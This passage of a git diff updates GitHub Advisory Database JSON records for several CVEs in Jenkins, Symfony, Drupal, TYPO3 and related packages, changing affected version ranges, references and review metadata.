b/advisories/github-reviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-fvcf-wgxj-h7ch", - "modified": "2022-05-13T01:31:33Z", + "modified": "2024-01-30T22:26:32Z", "published": "2022-05-13T01:31:33Z", "aliases": [ "CVE-2019-10292" ], + "summary": "CSRF vulnerability in Jenkins Nomad Plugin allow SSRF", "details": "A cross-site request forgery vulnerability in Jenkins Kmap Plugin in KmapJenkinsBuilder.DescriptorImpl form validation methods allows attackers to initiate a connection to an attacker-specified server.", "severity": [ { @@ -14,7 +15,15 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "Maven", + "name": "rg.jenkins-ci.plugins:kmap-jenkins" + }, + "versions": [ + "1.6" + ] + } ], "references": [ { @@ -39,8 +48,8 @@ "CWE-352" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:26:32Z", "nvd_published_at": "2019-04-04T16:29:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-fx37-56v6-85q6/GHSA-fx37-56v6-85q6.json b/advisories/github-reviewed/2022/05/GHSA-fx37-56v6-85q6/GHSA-fx37-56v6-85q6.json index 6584f5248a409..41e80e6720a04 100644 --- a/advisories/github-reviewed/2022/05/GHSA-fx37-56v6-85q6/GHSA-fx37-56v6-85q6.json +++ b/advisories/github-reviewed/2022/05/GHSA-fx37-56v6-85q6/GHSA-fx37-56v6-85q6.json @@ -44,7 +44,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "3.1.0" }, { "fixed": "3.1.2" @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-graphql/commit/db28f3075ae2335905f43ac808e9177497e354ff" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2019-12437.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-graphql" diff --git a/advisories/github-reviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json b/advisories/github-reviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json new file mode 100644 index 0000000000000..e48a86ad29810 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g2rp-qwrq-qqqq", + "modified": "2024-01-30T21:50:19Z", + "published": "2022-05-13T01:17:42Z", + "aliases": [ + "CVE-2019-1003094" + ], + "summary": "Jenkins Open STF Plugin stores credentials in plain text ", + "details": "Jenkins Open STF Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:open-stf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.0.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003094" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1059" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:50:19Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g378-6fg4-gx3v/GHSA-g378-6fg4-gx3v.json b/advisories/github-reviewed/2022/05/GHSA-g378-6fg4-gx3v/GHSA-g378-6fg4-gx3v.json index f554fd00d6f9f..1ea2cdbf036df 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g378-6fg4-gx3v/GHSA-g378-6fg4-gx3v.json +++ b/advisories/github-reviewed/2022/05/GHSA-g378-6fg4-gx3v/GHSA-g378-6fg4-gx3v.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8132" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8132.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json b/advisories/github-reviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json new file mode 100644 index 0000000000000..1636e3098407d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3gj-632x-fhrh", + "modified": "2024-01-30T22:18:42Z", + "published": "2022-05-13T01:31:33Z", + "aliases": [ + "CVE-2019-1003028" + ], + "summary": "SSRF vulnerability due to missing permission check in Jenkins JMS Messaging Plugin", + "details": "A server-side request forgery vulnerability exists in Jenkins JMS Messaging Plugin 1.1.1 and earlier in SSLCertificateAuthenticationMethod.java, UsernameAuthenticationMethod.java that allows attackers with Overall/Read permission to have Jenkins connect to a JMS endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:jms-messaging" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003028" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-1033" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107295" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:18:42Z", + "nvd_published_at": "2019-02-20T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json b/advisories/github-reviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json new file mode 100644 index 0000000000000..a489353101076 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3rg-cj5x-3vpf", + "modified": "2024-01-30T22:26:13Z", + "published": "2022-05-13T01:31:33Z", + "aliases": [ + "CVE-2019-10278" + ], + "summary": "CSRF vulnerability in jenkins-reviewbot Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins jenkins-reviewbot Plugin in the ReviewboardDescriptor#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:jenkins-reviewbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.4.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10278" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1091" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:26:13Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g4g7-q726-v5hg/GHSA-g4g7-q726-v5hg.json b/advisories/github-reviewed/2022/05/GHSA-g4g7-q726-v5hg/GHSA-g4g7-q726-v5hg.json index 7c03da31d79f6..ede4a4319bd2f 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g4g7-q726-v5hg/GHSA-g4g7-q726-v5hg.json +++ b/advisories/github-reviewed/2022/05/GHSA-g4g7-q726-v5hg/GHSA-g4g7-q726-v5hg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4g7-q726-v5hg", - "modified": "2023-10-06T17:57:22Z", + "modified": "2024-02-08T19:30:02Z", "published": "2022-05-14T01:14:35Z", "aliases": [ "CVE-2018-11406" @@ -63,7 +63,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.3.0" + "introduced": "3.0.0" }, { "fixed": "3.3.17" @@ -109,6 +109,291 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] } ], "references": [ @@ -120,6 +405,22 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/319e1bdd43979d9c1559497de8d69adea28ab8d1" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-bundle/CVE-2018-11406.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2018-11406.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2018-11406.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-11406.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -140,6 +441,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2018-11406-csrf-token-fixation" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-11406" + }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4262" diff --git a/advisories/github-reviewed/2022/05/GHSA-g4rg-993r-mgx7/GHSA-g4rg-993r-mgx7.json b/advisories/github-reviewed/2022/05/GHSA-g4rg-993r-mgx7/GHSA-g4rg-993r-mgx7.json index b45581c841ee6..40bc7e887eab3 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g4rg-993r-mgx7/GHSA-g4rg-993r-mgx7.json +++ b/advisories/github-reviewed/2022/05/GHSA-g4rg-993r-mgx7/GHSA-g4rg-993r-mgx7.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-g4rg-993r-mgx7", - "modified": "2023-09-11T22:27:13Z", + "modified": "2024-02-02T20:50:00Z", "published": "2022-05-24T19:18:27Z", "aliases": [ "CVE-2021-42740" ], "summary": "Improper Neutralization of Special Elements used in a Command in Shell-quote", - "details": "The shell-quote package before 1.7.3 for Node.js allows command injection. An attacker can inject unescaped shell metacharacters through a regex designed to support Windows drive letters. If the output of this package is passed to a real shell as a quoted argument to a command with `exec()`, an attacker can inject arbitrary commands. This is because the Windows drive letter regex character class is `{A-z]` instead of the correct `{A-Za-z]`. Several shell metacharacters exist in the space between capital letter Z and lower case letter a, such as the backtick character.", + "details": "The shell-quote package before 1.7.3 for Node.js allows command injection. An attacker can inject unescaped shell metacharacters through a regex designed to support Windows drive letters. If the output of this package is passed to a real shell as a quoted argument to a command with `exec()`, an attacker can inject arbitrary commands. This is because the Windows drive letter regex character class is `[A-z]` instead of the correct `[A-Za-z]`. Several shell metacharacters exist in the space between capital letter Z and lower case letter a, such as the backtick character.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2022/05/GHSA-g4rg-rw65-8hfg/GHSA-g4rg-rw65-8hfg.json b/advisories/github-reviewed/2022/05/GHSA-g4rg-rw65-8hfg/GHSA-g4rg-rw65-8hfg.json index 420701a9fdb4d..c243364336b02 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g4rg-rw65-8hfg/GHSA-g4rg-rw65-8hfg.json +++ b/advisories/github-reviewed/2022/05/GHSA-g4rg-rw65-8hfg/GHSA-g4rg-rw65-8hfg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4rg-rw65-8hfg", - "modified": "2023-10-06T18:00:13Z", + "modified": "2024-02-08T19:28:13Z", "published": "2022-05-14T01:22:27Z", "aliases": [ "CVE-2018-11385" @@ -63,7 +63,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.3.0" + "introduced": "3.0.0" }, { "fixed": "3.3.17" @@ -109,6 +109,196 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.48" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.41" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] } ], "references": [ @@ -128,6 +318,18 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/fad1e1f2ea336e85c889feece9d0e23fbfcf777d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2018-11385.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2018-11385.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-11385.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -152,6 +354,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2018-11385-session-fixation-issue-for-guard-authentication" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-11385" + }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4262" diff --git a/advisories/github-reviewed/2022/05/GHSA-g78h-pf65-46rv/GHSA-g78h-pf65-46rv.json b/advisories/github-reviewed/2022/05/GHSA-g78h-pf65-46rv/GHSA-g78h-pf65-46rv.json index 66c1d7ac62ded..54b907d143524 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g78h-pf65-46rv/GHSA-g78h-pf65-46rv.json +++ b/advisories/github-reviewed/2022/05/GHSA-g78h-pf65-46rv/GHSA-g78h-pf65-46rv.json @@ -15,6 +15,44 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.5.0" + }, + { + "fixed": "8.5.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ckeditor-dev" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.10" + }, + { + "fixed": "4.9.2" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -37,17 +75,17 @@ { "package": { "ecosystem": "Packagist", - "name": "drupal/core" + "name": "drupal/drupal" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "8.5.0" + "introduced": "8.0" }, { - "fixed": "8.5.2" + "fixed": "8.4.7" } ] } @@ -55,18 +93,18 @@ }, { "package": { - "ecosystem": "npm", - "name": "ckeditor-dev" + "ecosystem": "Packagist", + "name": "drupal/drupal" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "4.5.10" + "introduced": "8.5" }, { - "fixed": "4.9.2" + "fixed": "8.5.2" } ] } @@ -78,6 +116,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9861" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2018-9861.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2018-9861.yaml" + }, { "type": "WEB", "url": "https://github.com/ckeditor/ckeditor-dev/blob/master/CHANGES.md" diff --git a/advisories/github-reviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json b/advisories/github-reviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json new file mode 100644 index 0000000000000..8bbfc15e19a0c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g7cf-wg27-qw87", + "modified": "2024-01-30T23:17:03Z", + "published": "2022-05-17T00:50:18Z", + "aliases": [ + "CVE-2014-9634" + ], + "summary": "Jenkins secure flag not set on session cookies", + "details": "Jenkins before 1.586 does not set the secure flag on session cookies when run on Tomcat 7.0.41 or later, which makes it easier for remote attackers to capture cookies by intercepting their transmission within an HTTP session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.586" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9634" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/jenkins/commit/582128b9ac179a788d43c1478be8a5224dc19710" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769682" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185148" + }, + { + "type": "WEB", + "url": "https://issues.jenkins-ci.org/browse/JENKINS-25019" + }, + { + "type": "WEB", + "url": "https://jenkins.io/changelog-old/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2015/01/22/3" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/72054" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:17:03Z", + "nvd_published_at": "2017-09-12T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json b/advisories/github-reviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json new file mode 100644 index 0000000000000..bb3256cddefd5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json @@ -0,0 +1,131 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g857-p997-wx7w", + "modified": "2024-02-08T21:35:25Z", + "published": "2022-05-02T03:46:56Z", + "aliases": [ + "CVE-2009-3629" + ], + "summary": "TYPO3 Backend vulnerable to Cross-site Scripting", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3629" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53918" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:35:25Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g888-g2pp-82hf/GHSA-g888-g2pp-82hf.json b/advisories/github-reviewed/2022/05/GHSA-g888-g2pp-82hf/GHSA-g888-g2pp-82hf.json index 3875c91426db4..9b5326cfb6bde 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g888-g2pp-82hf/GHSA-g888-g2pp-82hf.json +++ b/advisories/github-reviewed/2022/05/GHSA-g888-g2pp-82hf/GHSA-g888-g2pp-82hf.json @@ -28,7 +28,45 @@ "introduced": "0" }, { - "fixed": "1.15.4" + "fixed": "1.10.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "simplesamlphp/saml2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0" + }, + { + "fixed": "2.3.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "simplesamlphp/saml2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0" + }, + { + "fixed": "3.1.4" } ] } @@ -44,6 +82,10 @@ "type": "WEB", "url": "https://github.com/simplesamlphp/saml2/commit/4f6af7f69f29df8555a18b9bb7b646906b45924d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/saml2/CVE-2018-7711.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00017.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-g97c-jfx6-xvxh/GHSA-g97c-jfx6-xvxh.json b/advisories/github-reviewed/2022/05/GHSA-g97c-jfx6-xvxh/GHSA-g97c-jfx6-xvxh.json index 39f267ec97b9d..c0942d42ccad6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g97c-jfx6-xvxh/GHSA-g97c-jfx6-xvxh.json +++ b/advisories/github-reviewed/2022/05/GHSA-g97c-jfx6-xvxh/GHSA-g97c-jfx6-xvxh.json @@ -41,7 +41,45 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.6.0" + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": 